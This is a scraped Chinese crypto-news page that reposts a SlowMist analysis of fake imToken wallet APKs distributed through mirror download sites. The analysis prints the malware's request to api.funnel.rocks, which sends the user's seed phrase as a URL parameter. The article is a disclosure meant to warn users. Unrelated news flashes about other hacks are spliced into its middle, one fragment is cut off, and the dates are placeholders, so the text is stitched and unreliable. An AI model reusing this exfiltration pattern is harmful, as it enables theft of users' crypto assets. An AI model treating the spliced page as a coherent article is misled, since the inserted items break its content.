加密貨幣交易所 加密貨幣交易所
Ctrl+D 加密貨幣交易所
ads
首頁 > Luna > Info

慢霧:Web3假錢包第三方源調查分析_WEB:COM

Author:

Time:1900/1/1 0:00:00

原文作者:?山&耀

技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄”不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。

慢霧:JPEG'd攻擊者或已將全部6106.75枚ETH歸還給項目方:8月4日消息,慢霧MistTrack監測顯示,JPEG'd攻擊者或已將全部6106.75枚ETH歸還給項目方。[2023/8/4 16:18:46]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

據數據統計站點similarweb統計,apkcombo站點:

慢霧:Transit Swap黑客攻擊交易被搶跑,套利機器人獲利超100萬美元:10月1日消息,據慢霧安全團隊情報,Transit Swap 黑客轉移用戶 BSC 鏈 BUSD 資產時被套利機器人搶跑,區塊高度為21816885,獲利107萬BUSD。套利機器人相關地址列表如下:0xa957...70d2、0x90b5...8ff4、0xcfb0...7ac7、

截止到目前,在各方的共同努力下,黑客已將 70% 左右的被盜資產退還到Transit Swap開發者地址,建議套利機器人所屬人同樣通過service@transit.finance或鏈上地址與Transit Swap取得聯系,共同將此次被盜事件的受害用戶損失降低到最小。[2022/10/2 18:37:44]

全球排名:?1,?809?

動態 | 慢霧:Cryptopia被盜資金發生轉移:據慢霧科技反洗錢(AML)系統監測顯示,Cryptopia攻擊者分兩次轉移共20,843枚ETH,價值超380萬美元。目前資金仍停留在 0x90d78A49 和 0x6D693560 開頭的兩個新地址,未向交易所轉移。據悉,今年早些時候加密貨幣交易所Cryptopia遭受了黑客攻擊,價值超過1600萬美元的以太坊和ERC-20代幣被盜。[2019/11/17]

國家排名:?7,?370?

品類排名:?168?

我們可以看到它的影響力和流量都非常大。

它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?

分析 | 慢霧:攻擊者拿下了DragonEx盡可能多的權限 攻擊持續至少1天:據慢霧安全團隊的鏈上情報分析,從DragonEx公布的“攻擊者地址”的分析來看,20 個幣種都被盜取(但還有一些DragonEx可交易的知名幣種并沒被公布),從鏈上行為來看攻擊這些幣種的攻擊手法并不完全相同,攻擊持續的時間至少有1天,但能造成這種大面積盜取結果的,至少可以推論出:攻擊者拿下了DragonEx盡可能多的權限,更多細節請留意后續披露。[2019/3/26]

我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:

https://play.google.com/store/apps/details??id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。

而apkcombo鏡像站的下載路徑為:

https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11?,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3?,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown

下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助記詞>

看下圖,最早的“api.funnel.rocks”證書出現在2022-06-03?,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

1?/imToken錢包:https://token.im/

2?/TokenPocket錢包:https://www.tokenpocket.pro/

3?/TronLink錢包:https://www.tronlink.org/

4?/比特派錢包:https://bitpie.com/

5?/MetaMask錢包:https://metamask.io/

6?/TrustWallet:https://trustwallet.com/

請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

Tags:WEBKENTOKENCOMWEB69ZGLYSB TokenKnoxstertokenCOM價格

Luna
Wed 3社交領域的Mirror 你布局了嗎?_Mirror:MIRACLE

現在社會上的社交內容發布平臺越來越多,我們個人怎么選擇布局一個適合自己的,在加上現在Web3板塊的火熱,還有現在行情不穩定性因素,往往一個項目的產生肯定是符合現在當今社會的需求的.

1900/1/1 0:00:00
爆火的ARB鏈上,這個最值得期待的項目你知道嗎?_LOKI:FLOKICMO幣

??爆火的ARB鏈上,最值得期待的項目ArbFlokiAI即將開啟自從ArbDoge項目大火之后,也是帶動了新的市場熱點,aidoge上線就是百倍幣直接就上線的“三大”中的歐意.

1900/1/1 0:00:00
火必將于2023年4月25日20:00(GMT 8)開放OSMO (Osmosis)交易

尊敬的用戶: 火必將于2023年4月25日20:00(GMT8)開放OSMO(Osmosis)現貨交易(OSMO/USDT)和網格交易(OSMO/USDT).

1900/1/1 0:00:00
與Chris Olsen談DCT社區:數字經濟中的機遇和挑戰_數字藝術:數字藝術設計大賽

作為DCT社區和DriveCapital的創始人之一,ChrisOlsen在數字貨幣領域有著廣泛的影響力和聲譽.

1900/1/1 0:00:00
Hotcoin關於下線FIL/ETH並移除交易對的公告_HOT:slingshot幣圈

尊敬的用戶:Hotcoin將於2023年4月27日16:00移除FIL/ETH交易對,移除交易對後所有委單將自動撤銷,資產將返回委單帳戶.

1900/1/1 0:00:00
LUNC能達到$1嗎?XRP 幣還會漲嗎?_LUN:PLE

LUNC在過去一周下跌了14%,顯示出看跌跡象。投資者預計未來一周會出現小幅反彈,因為他們以較低的價格購買了$LUNC.

1900/1/1 0:00:00
ads